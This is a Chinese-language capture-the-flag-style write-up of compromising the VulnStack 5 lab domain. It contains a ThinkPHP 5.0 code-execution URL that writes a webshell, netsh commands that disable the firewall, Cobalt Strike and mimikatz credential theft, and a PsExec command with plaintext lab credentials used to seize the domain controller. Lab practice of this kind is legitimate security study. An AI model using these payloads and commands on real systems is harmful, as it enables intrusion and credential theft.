红日VulnStack（5）靶机实战

1.环境搭建

靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/
win7（双网卡）：
192.168.135.150（外网）
192.168.138.136（内网）
外网使用NAT模式，内网仅主机模式。

win2008:

2.外网信息收集

2.1访问目标网站发现是个TP框架的站。

2.2版本判断

通过报错得知TP的详细版本

2.3进行目录扫描

拿服务器权限

1.当我们确认框架和具体版本后，就可以寻找框架对应的历史漏洞poc。

ThinkPhp5.0任意代码执行：https://www.cnblogs.com/backlion/p/10106676.html

2.尝试写入shell

http://192.168.135.150/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^>shell.php
成功的话会写入到public目录下，然后访问一下shell.php就拿蚁剑连接。

然后就进入到我们的内网了

3.内网信息收集

1.查看一下权限

如果权限较低的话就要提权，可以systeminfo查看补丁信息然后寻找对应的EXP进行提权。

3.1存活主机

4横向渗透

4.1先打开Cobalt Strike然后让win7上线

4.2minikatz尝试读取密码

4.3找域控制器

内网扫描存活主机

ipconfig -all 发现DNS后缀为sun.com这一般是域控制器的域名

ping一下得到ip

就可以确定192.168.138.138的主机就是域控制器了

5拿域控

5.1提权

先把win7的administrator权限提升为system，这里使用烂土豆，成功提权SYStem

5.2psexec传递

因为域控是不与外网进行接触的，所以要先在已经上线的主机上建立一个listen

然后生成一个Executable(S)木马，上传到win7上

因为自带的psexec只可以在目标可以访问外网的情况下使用所以这我们还要自己上传一个psexec.exe

因为win7的防火墙缘故，7777端口是进不去的可以，关闭防火墙:NetSh Advfirewall set allprofiles state off ，或者添加规则来放行7777端口

netsh advfirewall firewall add rule name=cs dir=in action=allow protocol=TCP localport=7777

最后使用上传的psexec加上抓取的明文密码配合exe成功上线域控。

Shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138 -u sun\Administrator -p WW123123ww. -d -c C:\phpStudy\PHPTutorial\WWW\public\nei.exe
(psexec的用法)[https://blog.csdn.net/jamesdodo/article/details/81743224]

总结：
先说遇到的坑：system的权限读取密码和执行psexec老报错，administrator就很顺利，不晓得是靶机的问题还是我自己搭建的环境有问题。
充环境搭建到域控上线用了两天太菜了，不过好在学到了一些东西，加油！！